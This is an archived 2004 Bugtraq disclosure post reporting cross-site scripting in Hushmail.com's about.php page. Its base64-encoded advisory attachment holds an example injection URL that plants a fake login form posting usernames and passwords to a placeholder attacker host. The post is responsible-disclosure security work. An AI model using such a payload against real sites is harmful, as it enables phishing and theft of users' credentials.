[34104] in bugtraq
Multiple vulnerabilities in Hushmail.com
daemon@ATHENA.MIT.EDU (Calum Power)
Thu Mar 11 13:30:13 2004
Message-Id: <200403110650.i2B6o9t1028015@mailserver3.hushmail.com>
Date: Wed, 10 Mar 2004 22:50:08 -0800
To: bugtraq@securityfocus.com
Cc:
From: "Calum Power" <enune@hush.ai>
MIME-Version: 1.0
Content-type: multipart/mixed; boundary="Hush_boundary-40500c20a74ac"
--Hush_boundary-40500c20a74ac
Content-type: text/plain
Hello Bugtraq,
There has been 2 vulnerabilities found in the secure Hushmail.com webmail/data
storage service.
One is a Cross-Site-Scripting vulnerability, and is discussed in the
attached advisory. This has now been fixed.
The second is currently in the progress of being fixed, and because of
this I will not be releasing details until the vulnerability is repaired.
When I do, they will be posted on my website (http://www.fribble.net/security.php)
Cheers,
Calum Power
- Cultural Jammer
- Security Enthusiast
- Hopeless Cynic
http://www.fribble.net
--Hush_boundary-40500c20a74ac
Content-type: text/plain; name="hushmail_09-03-04.txt"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="hushmail_09-03-04.txt"
Q3Jvc3MtU2l0ZS1TY3JpcHRpbmcgdnVsbmVyYWJpbGl0aWVzIGluIEh1c2htYWlsLmNvbSB3ZWJz
aXRlDQotLS0tLS0tLS0tLS0tLSA5LzAzLzIwMDQgLS0tLS0tLS0tLS0tLS0NCg0KRGlzY292ZXJl
ZCBieTogQ2FsdW0gUG93ZXIgW0VudW5lXQ0KVmVyc2lvbnMgQWZmZWN0ZWQ6IDw9IDgvMDMvMjAw
NA0KVW5hZmZlY3RlZCB2ZXJzaW9uczogOS8wMy8yMDA0DQoNClZlbmRvcjoNCkh1c2ggQ29tbXVu
aWNhdGlvbnMgKHd3dy5odXNoLmNvbSkNCg0KUHJvZHVjdCBEZXNjcmlwdGlvbjoNCkh1c2htYWls
LmNvbSBpcyBhIGZhc3QsIHNlY3VyZSBhbmQgZWFzeSBlbWFpbCBzZXJ2aWNlLiBUaGVpciBwcm9k
dWN0cyAocmFuZ2luZyBmcm9tIGJhc2ljIFdlYm1haWwgdG8gZGF0YSBzdG9yYWdlKQ0KYXJlIHVz
ZWQgYWxsIG92ZXIgdGhlIHdvcmxkIChhbmQgYnkgc29tZSBvZiB0aGUgd29ybGQncyB0b3Agc2Vj
dXJpdHkgZXhwZXJ0cykgYXMgYSBtZWFucyBvZiBzZWN1cmUgZGF0YSB0cmFuc2Zlci4NCg0KDQpT
dW1tYXJ5Og0KQ3Jvc3Mtc2l0ZS1zY3JpcHRpbmcgdnVsbmVyYWJpbGl0aWVzIGluIEh1c2htYWls
LmNvbSB3ZWJzaXRlIG1heSBhbGxvdyBmb3IgdGhlIG1hbmlwdWxhdGlvbg0Kb2YgZGF0YSBhdmFp
bGFibGUgdG8gdXNlcnMuDQoNCg0KRGV0YWlsczoNCkEgY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcgdnVs
bmVyYWJpbGl0eSBleGl0cyBpbiB0aGUgcGFnZSAnaHR0cHM6Ly93d3cuaHVzaG1haWwuY29tL2Fi
b3V0LnBocCcuDQpCeSBtYW5pcHVsYXRpbmcgdGhlICdzdWJzZWMnIEhUVFAvR0VUIHZhcmlhYmxl
LCBhIG1hbGljaW91cyBhdHRhY2tlciBjb3VsZCBtYW5pcHVsYXRlIHRoZSBvdXRwdXQNCm9mIHRo
ZSBhYm91dC5waHAgc2NyaXB0IHRvIHRyaWNrIHVzZXJzIGludG8gYmVsaWV2aW5nIHRoYXQgYSBm
cmF1ZHVsZW50IHBhZ2UgaXMgbGVnaXRpbWF0ZS4NCg0KRm9yIGV4YW1wbGUsIGJ5IG1hbmlwdWxh
dGluZyB0aGUgJ3N1YnNlYycgdmFyaWFibGUgKGh0dHBzOi8vd3d3Lmh1c2htYWlsLmNvbS9hYm91
dC5waHA/c3Vic2VjPSkNCndpdGggdGhlIGJlbG93IHN0cmluZywgYW4gYXR0YWNrZXIgY291bGQg
Y2F1c2UgdGhlIEh1c2htYWlsIHdlYnNpdGUgdG8gb3V0cHV0IGEgZm9ybSwgdGhhdCBtYXkNCnRy
aWNrIHRoZSB1c2VyIGludG8gaW5wdXR0aW5nIHRoZWlyIGxvZ2luIGluZm9ybWF0aW9uIGludG8g
YSB3ZWIgZm9ybSwgd2hpY2ggaXMgdGhlbiBzZW50IHRvIGENCndlYnNpdGUgb2YgdGhlIGF0dGFj
a2VycyBjaG9pY2U6DQpodHRwczovL3d3dy5odXNobWFpbC5jb20vYWJvdXQucGhwP3N1YnNlYz0n
KTs8L3NjcmlwdD48Zm9ybSBhY3Rpb249Imh0dHA6Ly9hdHRhY2tlci9zY3JpcHQucGhwIj4NClVz
ZXJuYW1lOiA8aW5wdXQgbmFtZT0idXNlciI+UGFzc3dvcmQ6IDxpbnB1dCBuYW1lPSJwYXNzIj48
L2Zvcm0+DQoNCg0KSW1wYWN0Og0KVGhlIGltcGFjdCBvZiB0aGlzIHZ1bG5lcmFiaWxpdHkgb24g
YSBjb21wYW55IHN1Y2ggYXMgSHVzaG1haWwgY291bGQgYmUgaHVnZSwgYXMgdGhlaXIgcHJvZHVj
dHMgYXJlDQptYXJrZXRlZCBhcyBiZWluZyBzZWN1cmUgYW5kIHNhZmUuIEF0dGFja2VycyBjb3Vs
ZCB1c2UgdGhpcyB2dWxuZXJhYmlsaXR5IHRvICdwaGlzaCcgZm9yIHVzZXIgbG9nb24gZGV0YWls
cywNCmFuZCBwb3NzaWJseSBjb21wcm9taXNlIGVuY3J5cHRlZCBhY2NvdW50cy4NCg0KQWNrbm93
bGVkZ2VtZW50czoNClRoYW5rcyB0byB0aGUgQnJpYW4gU21pdGggb2YgSHVzaG1haWwgZm9yIGhp
cyBzcGVlZHkgcmVzcG9uc2UuIEh1c2ggQ29tbXVuaWNhdGlvbnMgYXJlIGRlZmluaXRlbHkgZGVk
aWNhdGVkDQp0byBwcm92aWRpbmcgYSB0b3AgbGV2ZWwgb2Ygc2VjdXJpdHkgYW5kIGVmZmljaWVu
Y3kgdG8gdGhlaXIgY3VzdG9tZXJzLg0KDQpBbG9oYSdzOg0KckFjaGVsLCBNYXJhamluLCBWYWxU
cnVtLCBwYWNrZXRzdG9ybSwgbmV3b3JkZXIuYm94LnNrLCBibGFja3N1bi5ib3guc2ssIFBldGVy
IFdpbnRlci1TbWl0aCAoSSBsaWtlIHlvdXIgd29yayA9KQ0K
--Hush_boundary-40500c20a74ac--
